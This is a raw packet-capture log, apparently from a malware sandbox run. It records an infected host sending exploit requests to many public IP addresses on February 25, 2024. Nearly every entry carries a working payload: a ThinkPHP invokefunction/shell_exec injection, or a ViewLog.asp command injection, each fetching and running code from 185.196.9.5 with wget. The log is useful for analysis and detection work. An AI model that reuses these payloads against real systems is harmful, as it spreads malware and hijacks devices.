Feb 25, 2024 19:04:36.326992989 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:36.651371002 CET	479	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 257 Expires: Sun, 25 Feb 2024 18:04:36 GMT Date: Sun, 25 Feb 2024 18:04:36 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 31 66 66 62 31 33 30 32 26 23 34 36 3b 31 37 30 38 38 38 34 32 37 36 26 23 34 36 3b 31 62 32 31 62 30 36 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.1ffb1302.1708884276.1b21b06</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
874	192.168.2.15	42188	95.100.25.231	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:36.328525066 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:36.654798031 CET	478	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 256 Expires: Sun, 25 Feb 2024 18:04:36 GMT Date: Sun, 25 Feb 2024 18:04:36 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 66 66 62 31 33 30 32 26 23 34 36 3b 31 37 30 38 38 38 34 32 37 36 26 23 34 36 3b 31 62 33 34 32 39 33 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.ffb1302.1708884276.1b34293</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
875	192.168.2.15	34480	95.211.200.136	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:36.820594072 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:37.000277042 CET	323	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sun, 25 Feb 2024 18:04:36 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
876	192.168.2.15	43346	95.254.157.188	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:36.839005947 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
877	192.168.2.15	52072	95.100.119.69	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:36.909636974 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:37.180947065 CET	479	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 257 Expires: Sun, 25 Feb 2024 18:04:37 GMT Date: Sun, 25 Feb 2024 18:04:37 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 62 38 65 32 31 31 37 26 23 34 36 3b 31 37 30 38 38 38 34 32 37 37 26 23 34 36 3b 32 32 62 37 63 63 37 61 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.b8e2117.1708884277.22b7cc7a</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
878	192.168.2.15	55414	95.255.132.30	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:37.014796019 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:37.209240913 CET	515	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:04:37 GMT Server: Apache/2.4.7 (Ubuntu) Content-Length: 322 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 73 65 72 76 65 72 78 2d 77 65 62 2e 76 65 74 72 65 72 69 61 6d 75 73 73 6f 2e 6c 6f 63 61 6c 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.7 (Ubuntu) Server at serverx-web.vetreriamusso.local Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
879	192.168.2.15	44586	95.111.46.74	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:37.023323059 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
880	192.168.2.15	47692	95.100.228.42	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:37.297202110 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:37.554694891 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Sun, 25 Feb 2024 18:04:37 GMT Date: Sun, 25 Feb 2024 18:04:37 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 35 30 37 65 31 39 62 38 26 23 34 36 3b 31 37 30 38 38 38 34 32 37 37 26 23 34 36 3b 36 65 39 61 62 31 39 35 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.507e19b8.1708884277.6e9ab195</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
881	192.168.2.15	60140	95.214.146.14	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:37.916831017 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
882	192.168.2.15	46928	94.127.5.225	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:37.928431034 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:38.123399973 CET	525	IN	HTTP/1.1 503 Service Unavailable Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Sun, 25 Feb 2024 19:03:51 GMT Connection: close Content-Length: 326 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 35 30 33 2e 20 54 68 65 20 73 65 72 76 69 63 65 20 69 73 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Service Unavailable</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Service Unavailable</h2><hr><p>HTTP Error 503. The service is unavailable.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
883	192.168.2.15	49800	94.121.142.222	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:37.939158916 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
884	192.168.2.15	42750	62.29.100.136	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:37.939208031 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
885	192.168.2.15	58390	94.120.103.213	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:37.943002939 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
886	192.168.2.15	33608	94.121.101.187	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:37.943676949 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
887	192.168.2.15	52992	31.44.131.189	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:37.944577932 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
888	192.168.2.15	42534	95.86.116.202	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:37.947921038 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
889	192.168.2.15	39944	94.121.183.210	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:37.957314014 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
890	192.168.2.15	58252	94.121.147.84	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:37.958647966 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
891	192.168.2.15	42976	31.214.169.212	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:37.976277113 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:38.230753899 CET	502	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Sun, 25 Feb 2024 18:04:38 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
892	192.168.2.15	49778	31.173.157.224	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:37.990046978 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
